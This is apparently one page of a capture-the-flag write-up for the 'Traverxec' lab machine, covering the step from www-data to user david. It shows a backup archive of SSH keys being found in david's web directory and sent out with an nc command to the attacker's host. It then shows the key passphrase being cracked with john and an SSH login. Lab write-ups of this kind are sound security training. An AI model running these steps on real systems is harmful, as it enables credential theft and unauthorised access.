4 www-data > david

Reading https://www.gsp.com/cgi-bin/man.cgi?section=8&topic=NHTTPD#HOMEDIRS

Trying out http://traverxec.htb/~david/ Not allowed.

# HOMEDIRS [OPTIONAL]
homedirs                /home
homedirs_public         public_www

means public_www is what is served via nostromo.

Trying out /home/~david/public_www

cd /home/david/public_www
ls -la
total 16
drwxr-xr-x 3 david david 4096 Oct 25  2019 .
drwx--x--x 5 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david  402 Oct 25  2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25  2019 protected-file-area

cd protected-file-area
ls -la
total 16
drwxr-xr-x 2 david david 4096 Oct 25  2019 .
drwxr-xr-x 3 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david   45 Oct 25  2019 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25  2019 backup-ssh-identity-files.tgz
cat .htaccess
realm David's Protected File Area. Keep out!

Transferring backup-ssh-identity-files.tgz over to kali

www-data@traverxec:/home/david/public_www/protected-file-area$ nc -w 3 10.10.16.161 1234 < backup-ssh-identity-files.tgz
<3 10.10.16.161 1234 < backup-ssh-identity-files.tgz

$ tar xvf backup.tgz
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub

NOTE: ssh -i id_rsa does not work still asks for password

┌──(kashz㉿kali)-[~/…/traverxec/home/david/.ssh]
└─$ /usr/share/john/ssh2john.py id_rsa > ssh.hash

┌──(kashz㉿kali)-[~/…/traverxec/home/david/.ssh]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)

$ ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$ whoami;id
david
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Previous5 david > root Next3 box enum

Last updated 4 years ago